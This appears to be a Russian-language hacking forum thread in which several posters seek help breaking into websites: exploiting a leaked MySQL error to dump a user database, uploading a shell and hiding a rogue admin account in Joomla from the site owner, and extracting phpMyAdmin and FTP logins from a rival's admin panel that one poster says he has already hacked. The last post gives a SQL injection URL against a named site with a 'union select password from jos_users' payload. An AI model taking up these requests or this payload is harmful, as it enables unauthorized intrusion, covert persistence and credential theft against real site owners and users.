
 

Это я проверил в первую очередь. все условия выполнены... Шелл точно есть... ini верно... баг не пофикшен т.к качал ту версию которая указана на милворме...

Мне просто интересно, может это у них ошибка.. и этот способ не работает, а они пабликуют не проверенную инфу...

 

Подскажите пожалуйста. Дело в том что есть один сайт. И на нем происходит чтото на подобе активации акаунта. Т.е. ты долженн ввести свой логин и пароль там в форму.
Все зашибись работает. Случайно наткнулся на такую вещь. Если повторно активировать аккаунт то MySQL выдает ошибку с логином пасом и мылом...

Подскажите возможноли с помощью этой зацепки выудить с сайта бд пользователей? Если да, то подскажите что делать. Весь день читаю различные статьи и ничего покачто не получяается

 

iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?

ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?

Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо

 

Доступ в phpmyadmin или ftp из DLE

Я знаю что у хостинга на котором я взломал сайт логин и пароль от фтп и пхпмайадмин одинаковый, у меня есть админка сайта недруга вот мне и нужно из этой админки как нибудь выдрать данные для входа в пхпмайадмин, таким образом я получу доступ и к ftp их сайта! Подскажите как достать этот логин и пароли из админки??? Если нужен шелл... то подскажите какой!
Буду очень благодарен тому кто ответит!

 

Стукни 316996655

 

Как витянуть пароли с jos_users если есть SQL-Inj в c om_fire boa rd:
http:// whi teg uard-cl an .ру/component/option,com_fireboa rd/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/ ???
Делал так 20union%20select%20passwor d%20from%20jos_users но нет никакого результата